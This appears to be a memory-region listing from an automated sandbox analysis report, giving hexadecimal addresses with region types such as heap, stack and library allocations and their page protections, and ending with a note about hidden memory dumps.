2A084CBB000
|
heap
|
page read and write
|
||
|
72F3000
|
heap
|
page read and write
|
||
|
1BCC8915000
|
trusted library allocation
|
page read and write
|
||
|
2A084C7F000
|
heap
|
page read and write
|
||
|
6C6B000
|
stack
|
page read and write
|
||
|
1BCC6870000
|
heap
|
page read and write
|
||
|
EB4B9FE000
|
stack
|
page read and write
|
||
|
6F39000
|
heap
|
page read and write
|
||
|
6EB0000
|
heap
|
page read and write
|
||
|
1A347D84000
|
heap
|
page read and write
|
||
|
1A347AD0000
|
heap
|
page read and write
|
||
|
AC03DF7000
|
stack
|
page read and write
|
||
|
1BCC81E0000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8D58000
|
trusted library allocation
|
page read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
AC037CE000
|
stack
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
8A8000
|
stack
|
page read and write
|
||
|
749D000
|
stack
|
page read and write
|
||
|
2A084D60000
|
heap
|
page read and write
|
||
|
2A082BE0000
|
heap
|
page read and write
|
||
|
9380000
|
heap
|
page read and write
|
||
|
474E000
|
stack
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
heap
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
2A084CCB000
|
heap
|
page read and write
|
||
|
1BCE0858000
|
heap
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
96D0000
|
direct allocation
|
page read and write
|
||
|
4D9C000
|
stack
|
page read and write
|
||
|
2A084719000
|
heap
|
page read and write
|
||
|
1BCC68CF000
|
heap
|
page read and write
|
||
|
2A082CC7000
|
heap
|
page read and write
|
||
|
6F37000
|
heap
|
page read and write
|
||
|
2A084C10000
|
heap
|
page read and write
|
||
|
225DD000
|
stack
|
page read and write
|
||
|
90A0000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8D80000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8CFC000
|
trusted library allocation
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
4670000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
2276E000
|
stack
|
page read and write
|
||
|
BA4000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8D19000
|
trusted library allocation
|
page read and write
|
||
|
2284F000
|
stack
|
page read and write
|
||
|
2CEE000
|
stack
|
page read and write
|
||
|
6DED000
|
stack
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
2289B000
|
stack
|
page read and write
|
||
|
227D0000
|
remote allocation
|
page read and write
|
||
|
6EA0000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
57A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC20000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8D72000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
1BCE0818000
|
heap
|
page read and write
|
||
|
2B0E000
|
stack
|
page read and write
|
||
|
1BCC8D27000
|
trusted library allocation
|
page read and write
|
||
|
2A084D8E000
|
heap
|
page read and write
|
||
|
2295F000
|
stack
|
page read and write
|
||
|
82AC000
|
trusted library allocation
|
page read and write
|
||
|
AC04D0D000
|
stack
|
page read and write
|
||
|
2A082C7C000
|
heap
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
7FFAACA1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084C7F000
|
heap
|
page read and write
|
||
|
2C45000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
6F1D000
|
heap
|
page read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page read and write
|
There are 667 hidden memdumps, click here to show them.